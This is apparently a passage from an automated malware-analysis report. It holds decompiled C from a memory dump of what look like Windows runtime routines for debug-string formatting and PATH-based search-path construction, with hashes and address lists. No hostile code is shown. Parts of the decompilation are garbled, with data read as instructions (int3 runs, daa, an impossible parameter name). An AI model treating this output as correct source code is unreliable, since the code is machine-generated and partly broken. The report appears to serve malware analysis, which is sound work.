                                            • Instruction ID: d3b2efc54865fe87708270c9f371d02c2dec173c6a7fff52a2a66bd7aa80037b
                                            • Opcode Fuzzy Hash: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
                                            • Instruction Fuzzy Hash: C6517775A08701CFE762CF6CC08092BBBE5FB88610F1489AEE9D587395D771E840CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E00FEB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                            				signed int _t65;
                                            				signed short _t69;
                                            				intOrPtr _t70;
                                            				signed short _t85;
                                            				void* _t86;
                                            				signed short _t89;
                                            				signed short _t91;
                                            				intOrPtr _t92;
                                            				intOrPtr _t97;
                                            				intOrPtr* _t98;
                                            				signed short _t99;
                                            				signed short _t101;
                                            				void* _t102;
                                            				char* _t103;
                                            				signed short _t104;
                                            				intOrPtr* _t110;
                                            				void* _t111;
                                            				void* _t114;
                                            				intOrPtr* _t115;
                                            
                                            				_t109 = __esi;
                                            				_t108 = __edi;
                                            				_t106 = __edx;
                                            				_t95 = __ebx;
                                            				_push(0x90);
                                            				_push(0x10bf7a8);
                                            				E0103D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                            				if(__edx == 0xffffffff) {
                                            					L6:
                                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                            					__eflags = _t65 & 0x00000002;
                                            					if((_t65 & 0x00000002) != 0) {
                                            						L3:
                                            						L4:
                                            						return E0103D130(_t95, _t108, _t109);
                                            					}
                                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                            					_t108 = 0;
                                            					_t109 = 0;
                                            					_t95 = 0;
                                            					__eflags = 0;
                                            					while(1) {
                                            						__eflags = _t95 - 0x200;
                                            						if(_t95 >= 0x200) {
                                            							break;
                                            						}
                                            						E0102D000(0x80);
                                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                            						_t108 = _t115;
                                            						_t95 = _t95 - 0xffffff80;
                                            						_t17 = _t114 - 4;
                                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                            						__eflags =  *_t17;
                                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                            						_t102 = _t110 + 1;
                                            						do {
                                            							_t85 =  *_t110;
                                            							_t110 = _t110 + 1;
                                            							__eflags = _t85;
                                            						} while (_t85 != 0);
                                            						_t111 = _t110 - _t102;
                                            						_t21 = _t95 - 1; // -129
                                            						_t86 = _t21;
                                            						__eflags = _t111 - _t86;
                                            						if(_t111 > _t86) {
                                            							_t111 = _t86;
                                            						}
                                            						E0102F3E0(_t108, _t106, _t111);
                                            						_t115 = _t115 + 0xc;
                                            						_t103 = _t111 + _t108;
                                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                            						_t89 = _t95 - _t111;
                                            						__eflags = _t89;
                                            						_push(0);
                                            						if(_t89 == 0) {
                                            							L15:
                                            							_t109 = 0xc000000d;
                                            							goto L16;
                                            						} else {
                                            							__eflags = _t89 - 0x7fffffff;
                                            							if(_t89 <= 0x7fffffff) {
                                            								L16:
                                            								 *(_t114 - 0x94) = _t109;
                                            								__eflags = _t109;
                                            								if(_t109 < 0) {
                                            									__eflags = _t89;
                                            									if(_t89 != 0) {
                                            										 *_t103 = 0;
                                            									}
                                            									L26:
                                            									 *(_t114 - 0xa0) = _t109;
                                            									 *(_t114 - 4) = 0xfffffffe;
                                            									__eflags = _t109;
                                            									if(_t109 >= 0) {
                                            										L31:
                                            										_t98 = _t108;
                                            										_t39 = _t98 + 1; // 0x1
                                            										_t106 = _t39;
                                            										do {
                                            											_t69 =  *_t98;
                                            											_t98 = _t98 + 1;
                                            											__eflags = _t69;
                                            										} while (_t69 != 0);
                                            										_t99 = _t98 - _t106;
                                            										__eflags = _t99;
                                            										L34:
                                            										_t70 =  *[fs:0x30];
                                            										__eflags =  *((char*)(_t70 + 2));
                                            										if( *((char*)(_t70 + 2)) != 0) {
                                            											L40:
                                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                            											 *(_t114 - 4) = 1;
                                            											_push(_t114 - 0x74);
                                            											L0103DEF0(_t99, _t106);
                                            											 *(_t114 - 4) = 0xfffffffe;
                                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                            											goto L3;
                                            										}
                                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                            											goto L40;
                                            										}
                                            										_push( *((intOrPtr*)(_t114 + 8)));
                                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                            										_push(_t99 & 0x0000ffff);
                                            										_push(_t108);
                                            										_push(1);
                                            										_t101 = E0102B280();
                                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                            										if( *((char*)(_t114 + 0x14)) == 1) {
                                            											__eflags = _t101 - 0x80000003;
                                            											if(_t101 == 0x80000003) {
                                            												E0102B7E0(1);
                                            												_t101 = 0;
                                            												__eflags = 0;
                                            											}
                                            										}
                                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                            										goto L4;
                                            									}
                                            									__eflags = _t109 - 0x80000005;
                                            									if(_t109 == 0x80000005) {
                                            										continue;
                                            									}
                                            									break;
                                            								}
                                            								 *(_t114 - 0x90) = 0;
                                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                            								_t91 = E0102E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                            								_t115 = _t115 + 0x10;
                                            								_t104 = _t91;
                                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                            								__eflags = _t104;
                                            								if(_t104 < 0) {
                                            									L21:
                                            									_t109 = 0x80000005;
                                            									 *(_t114 - 0x90) = 0x80000005;
                                            									L22:
                                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                            									L23:
                                            									 *(_t114 - 0x94) = _t109;
                                            									goto L26;
                                            								}
                                            								__eflags = _t104 - _t92;
                                            								if(__eflags > 0) {
                                            									goto L21;
                                            								}
                                            								if(__eflags == 0) {
                                            									goto L22;
                                            								}
                                            								goto L23;
                                            							}
                                            							goto L15;
                                            						}
                                            					}
                                            					__eflags = _t109;
                                            					if(_t109 >= 0) {
                                            						goto L31;
                                            					}
                                            					__eflags = _t109 - 0x80000005;
                                            					if(_t109 != 0x80000005) {
                                            						goto L31;
                                            					}
                                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                            					_t38 = _t95 - 1; // -129
                                            					_t99 = _t38;
                                            					goto L34;
                                            				}
                                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            					__eflags = __edx - 0x65;
                                            					if(__edx != 0x65) {
                                            						goto L2;
                                            					}
                                            					goto L6;
                                            				}
                                            				L2:
                                            				_push( *((intOrPtr*)(_t114 + 8)));
                                            				_push(_t106);
                                            				if(E0102A890() != 0) {
                                            					goto L6;
                                            				}
                                            				goto L3;
                                            			}

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID: _vswprintf_s
                                            • String ID:
                                            • API String ID: 677850445-0
                                            • Opcode ID: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
                                            • Instruction ID: 4acca2f3dfe0f84f097eef1dd9c31b29ab7f904f08ccaccfe8415c9ac5a8e1fd
                                            • Opcode Fuzzy Hash: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
                                            • Instruction Fuzzy Hash: 2A51C1B5D0025A8BEB21CF688885BAEBBF0BF00714F2041BDD899EB282D7754D45DB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E01012581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546911997) {
                                            				signed int _v8;
                                            				signed int _v16;
                                            				unsigned int _v24;
                                            				void* _v28;
                                            				signed int _v32;
                                            				unsigned int _v36;
                                            				void* _v37;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				intOrPtr _v60;
                                            				signed int _v64;
                                            				signed int _v68;
                                            				signed int _v72;
                                            				signed int _v76;
                                            				signed int _v80;
                                            				signed int _t233;
                                            				signed int _t237;
                                            				void* _t238;
                                            				void* _t239;
                                            				signed int _t243;
                                            				signed int _t245;
                                            				intOrPtr _t247;
                                            				signed int _t250;
                                            				signed int _t257;
                                            				signed int _t260;
                                            				signed int _t268;
                                            				intOrPtr _t274;
                                            				signed int _t276;
                                            				signed int _t278;
                                            				void* _t279;
                                            				signed int _t280;
                                            				unsigned int _t283;
                                            				signed int _t287;
                                            				intOrPtr* _t288;
                                            				signed int _t289;
                                            				signed int _t293;
                                            				intOrPtr _t305;
                                            				signed int _t314;
                                            				signed int _t316;
                                            				signed int _t317;
                                            				signed int _t321;
                                            				signed int _t322;
                                            				void* _t324;
                                            				signed int _t325;
                                            				signed int _t327;
                                            				signed int _t330;
                                            				void* _t331;
                                            				void* _t333;
                                            
                                            				_t327 = _t330;
                                            				_t331 = _t330 - 0x4c;
                                            				_v8 =  *0x10dd360 ^ _t327;
                                            				_push(__ebx);
                                            				_push(__esi);
                                            				_push(__edi);
                                            				_t321 = 0x10db2e8;
                                            				_v56 = _a4;
                                            				_v48 = __edx;
                                            				_v60 = __ecx;
                                            				_t283 = 0;
                                            				_v80 = 0;
                                            				asm("movsd");
                                            				_v64 = 0;
                                            				_v76 = 0;
                                            				_v72 = 0;
                                            				asm("movsd");
                                            				_v44 = 0;
                                            				_v52 = 0;
                                            				_v68 = 0;
                                            				asm("movsd");
                                            				_v32 = 0;
                                            				_v36 = 0;
                                            				asm("movsd");
                                            				_v16 = 0;
                                            				_t333 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                            				_t274 = 0x48;
                                            				_t303 = 0 | _t333 == 0x00000000;
                                            				_t314 = 0;
                                            				_v37 = _t333 == 0;
                                            				if(_v48 <= 0) {
                                            					L16:
                                            					_t45 = _t274 - 0x48; // 0x0
                                            					__eflags = _t45 - 0xfffe;
                                            					if(_t45 > 0xfffe) {
                                            						_t322 = 0xc0000106;
                                            						goto L32;
                                            					} else {
                                            						_t321 = L01004620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
                                            						_v52 = _t321;
                                            						__eflags = _t321;
                                            						if(_t321 == 0) {
                                            							_t322 = 0xc0000017;
                                            							goto L32;
                                            						} else {
                                            							 *(_t321 + 0x44) =  *(_t321 + 0x44) & 0x00000000;
                                            							_t50 = _t321 + 0x48; // 0x48
                                            							_t316 = _t50;
                                            							_t303 = _v32;
                                            							 *((intOrPtr*)(_t321 + 0x3c)) = _t274;
                                            							_t276 = 0;
                                            							 *((short*)(_t321 + 0x30)) = _v48;
                                            							__eflags = _t303;
                                            							if(_t303 != 0) {
                                            								 *(_t321 + 0x18) = _t316;
                                            								__eflags = _t303 - 0x10d8478;
                                            								 *_t321 = ((0 | _t303 == 0x010d8478) - 0x00000001 & 0xfffffffb) + 7;
                                            								E0102F3E0(_t316,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
                                            								_t303 = _v32;
                                            								_t331 = _t331 + 0xc;
                                            								_t276 = 1;
                                            								__eflags = _a8;
                                            								_t316 = _t316 + (( *_t303 & 0x0000ffff) >> 1) * 2;
                                            								if(_a8 != 0) {
                                            									_t268 = E010739F2(_t316);
                                            									_t303 = _v32;
                                            									_t316 = _t268;
                                            								}
                                            							}
                                            							_t287 = 0;
                                            							_v16 = 0;
                                            							__eflags = _v48;
                                            							if(_v48 <= 0) {
                                            								L31:
                                            								_t322 = _v68;
                                            								__eflags = 0;
                                            								 *((short*)(_t316 - 2)) = 0;
                                            								goto L32;
                                            							} else {
                                            								_t278 = _t321 + _t276 * 4;
                                            								_v56 = _t278;
                                            								do {
                                            									__eflags = _t303;
                                            									if(_t303 != 0) {
                                            										_t233 =  *(_v60 + _t287 * 4);
                                            										__eflags = _t233;
                                            										if(_t233 == 0) {
                                            											goto L30;
                                            										} else {
                                            											__eflags = _t233 == 5;
                                            											if(_t233 == 5) {
                                            												goto L30;
                                            											} else {
                                            												goto L22;
                                            											}
                                            										}
                                            									} else {
                                            										L22:
                                            										 *_t278 =  *(_v60 + _t287 * 4);
                                            										 *(_t278 + 0x18) = _t316;
                                            										_t237 =  *(_v60 + _t287 * 4);
                                            										__eflags = _t237 - 8;
                                            										if(_t237 > 8) {
                                            											goto L56;
                                            										} else {
                                            											switch( *((intOrPtr*)(_t237 * 4 +  &M01012959))) {
                                            												case 0:
                                            													__ax =  *0x10d8488;
                                            													__eflags = __ax;
                                            													if(__ax == 0) {
                                            														goto L29;
                                            													} else {
                                            														__ax & 0x0000ffff = E0102F3E0(__edi,  *0x10d848c, __ax & 0x0000ffff);
                                            														__eax =  *0x10d8488 & 0x0000ffff;
                                            														goto L26;
                                            													}
                                            													goto L108;
                                            												case 1:
                                            													L45:
                                            													E0102F3E0(_t316, _v80, _v64);
                                            													_t263 = _v64;
                                            													goto L26;
                                            												case 2:
                                            													 *0x10d8480 & 0x0000ffff = E0102F3E0(__edi,  *0x10d8484,  *0x10d8480 & 0x0000ffff);
                                            													__eax =  *0x10d8480 & 0x0000ffff;
                                            													__eax = ( *0x10d8480 & 0x0000ffff) >> 1;
                                            													__edi = __edi + __eax * 2;
                                            													goto L28;
                                            												case 3:
                                            													__eax = _v44;
                                            													__eflags = __eax;
                                            													if(__eax == 0) {
                                            														goto L29;
                                            													} else {
                                            														__esi = __eax + __eax;
                                            														__eax = E0102F3E0(__edi, _v72, __esi);
                                            														__edi = __edi + __esi;
                                            														__esi = _v52;
                                            														goto L27;
                                            													}
                                            													goto L108;
                                            												case 4:
                                            													_push(0x2e);
                                            													_pop(__eax);
                                            													 *(__esi + 0x44) = __edi;
                                            													 *__edi = __ax;
                                            													__edi = __edi + 4;
                                            													_push(0x3b);
                                            													_pop(__eax);
                                            													 *(__edi - 2) = __ax;
                                            													goto L29;
                                            												case 5:
                                            													__eflags = _v36;
                                            													if(_v36 == 0) {
                                            														goto L45;
                                            													} else {
                                            														E0102F3E0(_t316, _v76, _v36);
                                            														_t263 = _v36;
                                            													}
                                            													L26:
                                            													_t331 = _t331 + 0xc;
                                            													_t316 = _t316 + (_t263 >> 1) * 2 + 2;
                                            													__eflags = _t316;
                                            													L27:
                                            													_push(0x3b);
                                            													_pop(_t265);
                                            													 *((short*)(_t316 - 2)) = _t265;
                                            													goto L28;
                                            												case 6:
                                            													__ebx =  *0x10d575c;
                                            													__eflags = __ebx - 0x10d575c;
                                            													if(__ebx != 0x10d575c) {
                                            														_push(0x3b);
                                            														_pop(__esi);
                                            														do {
                                            															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                            															E0102F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                            															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                            															__edi = __edi + __eax * 2;
                                            															__edi = __edi + 2;
                                            															 *(__edi - 2) = __si;
                                            															__ebx =  *__ebx;
                                            															__eflags = __ebx - 0x10d575c;
                                            														} while (__ebx != 0x10d575c);
                                            														__esi = _v52;
                                            														__ecx = _v16;
                                            														__edx = _v32;
                                            													}
                                            													__ebx = _v56;
                                            													goto L29;
                                            												case 7:
                                            													 *0x10d8478 & 0x0000ffff = E0102F3E0(__edi,  *0x10d847c,  *0x10d8478 & 0x0000ffff);
                                            													__eax =  *0x10d8478 & 0x0000ffff;
                                            													__eax = ( *0x10d8478 & 0x0000ffff) >> 1;
                                            													__eflags = _a8;
                                            													__edi = __edi + __eax * 2;
                                            													if(_a8 != 0) {
                                            														__ecx = __edi;
                                            														__eax = E010739F2(__ecx);
                                            														__edi = __eax;
                                            													}
                                            													goto L28;
                                            												case 8:
                                            													__eax = 0;
                                            													 *(__edi - 2) = __ax;
                                            													 *0x10d6e58 & 0x0000ffff = E0102F3E0(__edi,  *0x10d6e5c,  *0x10d6e58 & 0x0000ffff);
                                            													 *(__esi + 0x38) = __edi;
                                            													__eax =  *0x10d6e58 & 0x0000ffff;
                                            													__eax = ( *0x10d6e58 & 0x0000ffff) >> 1;
                                            													__edi = __edi + __eax * 2;
                                            													__edi = __edi + 2;
                                            													L28:
                                            													_t287 = _v16;
                                            													_t303 = _v32;
                                            													L29:
                                            													_t278 = _t278 + 4;
                                            													__eflags = _t278;
                                            													_v56 = _t278;
                                            													goto L30;
                                            											}
                                            										}
                                            									}
                                            									goto L108;
                                            									L30:
                                            									_t287 = _t287 + 1;
                                            									_v16 = _t287;
                                            									__eflags = _t287 - _v48;
                                            								} while (_t287 < _v48);
                                            								goto L31;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					while(1) {
                                            						L1:
                                            						_t237 =  *(_v60 + _t314 * 4);
                                            						if(_t237 > 8) {
                                            							break;
                                            						}
                                            						switch( *((intOrPtr*)(_t237 * 4 +  &M01012935))) {
                                            							case 0:
                                            								__ax =  *0x10d8488;
                                            								__eflags = __ax;
                                            								if(__ax != 0) {
                                            									__eax = __ax & 0x0000ffff;
                                            									__ebx = __ebx + 2;
                                            									__eflags = __ebx;
                                            									goto L53;
                                            								}
                                            								goto L14;
                                            							case 1:
                                            								L44:
                                            								_t303 =  &_v64;
                                            								_v80 = E01012E3E(0,  &_v64);
                                            								_t274 = _t274 + _v64 + 2;
                                            								goto L13;
                                            							case 2:
                                            								__eax =  *0x10d8480 & 0x0000ffff;
                                            								__ebx = __ebx + __eax;
                                            								__eflags = __dl;
                                            								if(__dl != 0) {
                                            									__eax = 0x10d8480;
                                            									goto L80;
                                            								}
                                            								goto L14;
                                            							case 3:
                                            								__eax = E00FFEEF0(0x10d79a0);
                                            								__eax =  &_v44;
                                            								_push(__eax);
                                            								_push(0);
                                            								_push(0);
                                            								_push(4);
                                            								_push(L"PATH");
                                            								_push(0);
                                            								L57();
                                            								__esi = __eax;
                                            								_v68 = __esi;
                                            								__eflags = __esi - 0xc0000023;
                                            								if(__esi != 0xc0000023) {
                                            									L10:
                                            									__eax = E00FFEB70(__ecx, 0x10d79a0);
                                            									__eflags = __esi - 0xc0000100;
                                            									if(__esi == 0xc0000100) {
                                            										_v44 = _v44 & 0x00000000;
                                            										__eax = 0;
                                            										_v68 = 0;
                                            										goto L13;
                                            									} else {
                                            										__eflags = __esi;
                                            										if(__esi < 0) {
                                            											L32:
                                            											_t211 = _v72;
                                            											__eflags = _t211;
                                            											if(_t211 != 0) {
                                            												L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
                                            											}
                                            											_t212 = _v52;
                                            											__eflags = _t212;
                                            											if(_t212 != 0) {
                                            												__eflags = _t322;
                                            												if(_t322 < 0) {
                                            													L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
                                            													_t212 = 0;
                                            												}
                                            											}
                                            											goto L36;
                                            										} else {
                                            											__eax = _v44;
                                            											__ebx = __ebx + __eax * 2;
                                            											__ebx = __ebx + 2;
                                            											__eflags = __ebx;
                                            											L13:
                                            											_t283 = _v36;
                                            											goto L14;
                                            										}
                                            									}
                                            								} else {
                                            									__eax = _v44;
                                            									__ecx =  *0x10d7b9c; // 0x0
                                            									_v44 + _v44 =  *[fs:0x30];
                                            									__ecx = __ecx + 0x180000;
                                            									__eax = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                            									_v72 = __eax;
                                            									__eflags = __eax;
                                            									if(__eax == 0) {
                                            										__eax = E00FFEB70(__ecx, 0x10d79a0);
                                            										__eax = _v52;
                                            										L36:
                                            										_pop(_t315);
                                            										_pop(_t323);
                                            										__eflags = _v8 ^ _t327;
                                            										_pop(_t275);
                                            										return E0102B640(_t212, _t275, _v8 ^ _t327, _t303, _t315, _t323);
                                            									} else {
                                            										__ecx =  &_v44;
                                            										_push(__ecx);
                                            										_push(_v44);
                                            										_push(__eax);
                                            										_push(4);
                                            										_push(L"PATH");
                                            										_push(0);
                                            										L57();
                                            										__esi = __eax;
                                            										_v68 = __eax;
                                            										goto L10;
                                            									}
                                            								}
                                            								goto L108;
                                            							case 4:
                                            								__ebx = __ebx + 4;
                                            								goto L14;
                                            							case 5:
                                            								_t270 = _v56;
                                            								if(_v56 != 0) {
                                            									_t303 =  &_v36;
                                            									_t272 = E01012E3E(_t270,  &_v36);
                                            									_t283 = _v36;
                                            									_v76 = _t272;
                                            								}
                                            								if(_t283 == 0) {
                                            									goto L44;
                                            								} else {
                                            									_t274 = _t274 + 2 + _t283;
                                            								}
                                            								goto L14;
                                            							case 6:
                                            								__eax =  *0x10d5764 & 0x0000ffff;
                                            								goto L53;
                                            							case 7:
                                            								__eax =  *0x10d8478 & 0x0000ffff;
                                            								__ebx = __ebx + __eax;
                                            								__eflags = _a8;
                                            								if(_a8 != 0) {
                                            									__ebx = __ebx + 0x16;
                                            									__ebx = __ebx + __eax;
                                            								}
                                            								__eflags = __dl;
                                            								if(__dl != 0) {
                                            									__eax = 0x10d8478;
                                            									L80:
                                            									_v32 = __eax;
                                            								}
                                            								goto L14;
                                            							case 8:
                                            								__eax =  *0x10d6e58 & 0x0000ffff;
                                            								__eax = ( *0x10d6e58 & 0x0000ffff) + 2;
                                            								L53:
                                            								__ebx = __ebx + __eax;
                                            								L14:
                                            								_t314 = _t314 + 1;
                                            								if(_t314 >= _v48) {
                                            									goto L16;
                                            								} else {
                                            									_t303 = _v37;
                                            									goto L1;
                                            								}
                                            								goto L108;
                                            						}
                                            					}
                                            					L56:
                                            					_t288 = 0x25;
                                            					asm("int 0x29");
                                            					asm("out 0x28, al");
                                            					 *_t288 =  *_t288 + _t237;
                                            					asm("o16 sub [ecx], al");
                                            					_t238 = _t237 + _t331;
                                            					asm("daa");
                                            					 *_t288 =  *_t288 + _t238;
                                            					 *[es:ecx] =  *[es:ecx] + _t238;
                                            					_t324 = _t321 + 1;
                                            					 *_t288 =  *_t288 - _t238;
                                            					 *0x1f010126 =  *0x1f010126 + _t238;
                                            					_pop(_t279);
                                            					_t239 = _t238 + 0x1289401;
                                            					 *0x201055b =  *0x201055b + _t324;
                                            					 *_t288 =  *_t288 - _t239;
                                            					 *((intOrPtr*)(_t239 - 0x9fefed8)) =  *((intOrPtr*)(_t239 - 0x9fefed8)) + _t239;
                                            					asm("daa");
                                            					 *_t288 =  *_t288 + _t239;
                                            					_push(ds);
                                            					 *_t288 =  *_t288 - _t239;
                                            					 *((intOrPtr*)(_t324 + 0x28)) =  *((intOrPtr*)(_t324 + 0x28)) + _t288;
                                            					 *_t288 =  *_t288 + _t239;
                                            					asm("daa");
                                            					 *_t288 =  *_t288 + _t239;
                                            					asm("fcomp dword [ebx+0x5]");
                                            					 *((intOrPtr*)(_t239 +  &_a1546911997)) =  *((intOrPtr*)(_t239 +  &_a1546911997)) + _t324;
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					_push(0x20);
                                            					_push(0x10bff00);
                                            					E0103D08C(_t279, _t316, _t324);
                                            					_v44 =  *[fs:0x18];
                                            					_t317 = 0;
                                            					 *_a24 = 0;
                                            					_t280 = _a12;
                                            					__eflags = _t280;
                                            					if(_t280 == 0) {
                                            						_t243 = 0xc0000100;
                                            					} else {
                                            						_v8 = 0;
                                            						_t325 = 0xc0000100;
                                            						_v52 = 0xc0000100;
                                            						_t245 = 4;
                                            						while(1) {
                                            							_v40 = _t245;
                                            							__eflags = _t245;
                                            							if(_t245 == 0) {
                                            								break;
                                            							}
                                            							_t293 = _t245 * 0xc;
                                            							_v48 = _t293;
                                            							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0xfc1664));
                                            							if(__eflags <= 0) {
                                            								if(__eflags == 0) {
                                            									_t260 = E0102E5C0(_a8,  *((intOrPtr*)(_t293 + 0xfc1668)), _t280);
                                            									_t331 = _t331 + 0xc;
                                            									__eflags = _t260;
                                            									if(__eflags == 0) {
                                            										_t325 = E010651BE(_t280,  *((intOrPtr*)(_v48 + 0xfc166c)), _a16, _t317, _t325, __eflags, _a20, _a24);
                                            										_v52 = _t325;
                                            										break;
                                            									} else {
                                            										_t245 = _v40;
                                            										goto L62;
                                            									}
                                            									goto L70;
                                            								} else {
                                            									L62:
                                            									_t245 = _t245 - 1;
                                            									continue;
                                            								}
                                            							}
                                            							break;
                                            						}
                                            						_v32 = _t325;
                                            						__eflags = _t325;
                                            						if(_t325 < 0) {
                                            							__eflags = _t325 - 0xc0000100;
                                            							if(_t325 == 0xc0000100) {
                                            								_t289 = _a4;
                                            								__eflags = _t289;
                                            								if(_t289 != 0) {
                                            									_v36 = _t289;
                                            									__eflags =  *_t289 - _t317;
                                            									if( *_t289 == _t317) {
                                            										_t325 = 0xc0000100;
                                            										goto L76;
                                            									} else {
                                            										_t305 =  *((intOrPtr*)(_v44 + 0x30));
                                            										_t247 =  *((intOrPtr*)(_t305 + 0x10));
                                            										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t289;
                                            										if( *((intOrPtr*)(_t247 + 0x48)) == _t289) {
                                            											__eflags =  *(_t305 + 0x1c);
                                            											if( *(_t305 + 0x1c) == 0) {
                                            												L106:
                                            												_t325 = E01012AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
                                            												_v32 = _t325;
                                            												__eflags = _t325 - 0xc0000100;
                                            												if(_t325 != 0xc0000100) {
                                            													goto L69;
                                            												} else {
                                            													_t317 = 1;
                                            													_t289 = _v36;
                                            													goto L75;
                                            												}
                                            											} else {
                                            												_t250 = E00FF6600( *(_t305 + 0x1c));
                                            												__eflags = _t250;
                                            												if(_t250 != 0) {
                                            													goto L106;
                                            												} else {
                                            													_t289 = _a4;
                                            													goto L75;
                                            												}
                                            											}
                                            										} else {
                                            											L75:
                                            											_t325 = E01012C50(_t289, _a8, _t280, _a16, _a20, _a24, _t317);
                                            											L76:
                                            											_v32 = _t325;
                                            											goto L69;
                                            										}
                                            									}
                                            									goto L108;
                                            								} else {
                                            									E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            									_v8 = 1;
                                            									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                            									_t325 = _a24;
                                            									_t257 = E01012AE4( &_v36, _a8, _t280, _a16, _a20, _t325);
                                            									_v32 = _t257;
                                            									__eflags = _t257 - 0xc0000100;
                                            									if(_t257 == 0xc0000100) {
                                            										_v32 = E01012C50(_v36, _a8, _t280, _a16, _a20, _t325, 1);
                                            									}
                                            									_v8 = _t317;
                                            									E01012ACB();
                                            								}
                                            							}
                                            						}
                                            						L69:
                                            						_v8 = 0xfffffffe;
                                            						_t243 = _t325;
                                            					}
                                            					L70:
                                            					return E0103D0D1(_t243);
                                            				}
                                            				L108:
                                            			}






















































                                            0x01055cdf
                                            0x01055ce5
                                            0x00000000
                                            0x01055ceb
                                            0x01055ced
                                            0x01055cee
                                            0x00000000
                                            0x01055cee
                                            0x01055cb1
                                            0x01055cb4
                                            0x01055cb9
                                            0x01055cbb
                                            0x00000000
                                            0x01055cbd
                                            0x01055cbd
                                            0x00000000
                                            0x01055cbd
                                            0x01055cbb
                                            0x01012ab1
                                            0x01012ab1
                                            0x01012ac4
                                            0x01012ac6
                                            0x01012ac6
                                            0x00000000
                                            0x01012ac6
                                            0x01012aab
                                            0x00000000
                                            0x01012a00
                                            0x01012a09
                                            0x01012a0e
                                            0x01012a21
                                            0x01012a24
                                            0x01012a35
                                            0x01012a3a
                                            0x01012a3d
                                            0x01012a42
                                            0x01012a59
                                            0x01012a59
                                            0x01012a5c
                                            0x01012a5f
                                            0x01012a5f
                                            0x010129fa
                                            0x010129f3
                                            0x01012a64
                                            0x01012a64
                                            0x01012a6b
                                            0x01012a6b
                                            0x01012a6d
                                            0x01012a72
                                            0x01012a72
                                            0x00000000

                                            Strings
                                            Memory Dump Source
